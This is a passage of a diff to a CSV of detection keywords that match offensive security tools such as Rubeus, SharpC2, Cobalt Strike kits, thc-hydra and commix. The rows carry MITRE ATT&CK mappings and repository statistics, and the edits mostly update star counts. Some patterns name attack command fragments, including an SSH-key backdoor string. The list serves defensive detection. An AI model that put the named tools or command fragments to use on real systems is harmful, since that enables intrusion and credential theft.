T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","10","10","300","93","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" -"*COMHunter* -inproc*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*COMHunter* -localserver*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*COMHunter.csproj*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*COMHunter.exe*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*COMHunter.sln*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*COMHunter* -inproc*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*COMHunter* -localserver*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*COMHunter.csproj*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*COMHunter.exe*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*COMHunter.sln*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*COM-Hunter_v*.zip*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" "*COM-Hunter-main*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" -"*-command *.exe* -technique ccmstp*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*-command *.exe* -technique ccmstp*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*command_obfuscator.py*","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","0","N/A","10","10","1348","159","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" "*command=*###---POWERSHELL---*eval $(echo *","offensive_tool_keyword","Openssh","Infecting SSH Public Keys with backdoors","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","N/A","C2","https://blog.thc.org/infecting-ssh-public-keys-with-backdoors","1","0","N/A","10","9","N/A","N/A","N/A","N/A" "*CommandAndControl_*.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*CommandCam.exe*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*commandovm.*.installer.fireeye*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6323","1248","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" -"*commando-vm-master*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6323","1248","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" -"*Commands/Brute.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"*Commands/Createnetonly.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*commandovm.*.installer.fireeye*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*commando-vm-master*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*Commands/Brute.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Commands/Createnetonly.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "*Commands/DcomCommand.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/DroneCommand.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/ExecuteAssembly.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/KillProcess.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/ListProcesses.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"*Commands/Logonsession.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Commands/Logonsession.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "*Commands/PowerShellImport.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"*Commands/Preauthscan.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Commands/Preauthscan.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "*Commands/PrintWorkingDirectory.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/PsExecCommand.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/RevToSelf.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" @@ -8677,41 +8825,41 @@ "*Commands/Shell.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/ShInject.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/ShSpawn.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"*Commands/Silver.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Commands/Silver.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "*Commands/StealToken.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/StopDrone.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/TakeScreenshot.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/WhoAmI.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/WinRmCommand.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/WmiCommand.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"*commixproject/commix*","offensive_tool_keyword","commix","Automated All-in-One OS command injection and exploitation tool.","T1059 - T1053 - T1503","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/commixproject/commix","1","1","N/A","N/A","10","4034","781","2023-09-29T06:39:41Z","2015-03-20T08:38:26Z" +"*commixproject/commix*","offensive_tool_keyword","commix","Automated All-in-One OS command injection and exploitation tool.","T1059 - T1053 - T1503","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/commixproject/commix","1","1","N/A","N/A","10","4035","782","2023-09-29T06:39:41Z","2015-03-20T08:38:26Z" "*common.ReflectiveDLL*","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","101","24","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" "*common.ReflectiveDLL*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" -"*common_passwords.txt*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*common_passwords.txt*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" "*commonspeak_sublist.txt*","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z" -"*communicate_as_backdoor_user.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*communicate_as_backdoor_user.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" "*comnap_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*comnode_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"*compile_implant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 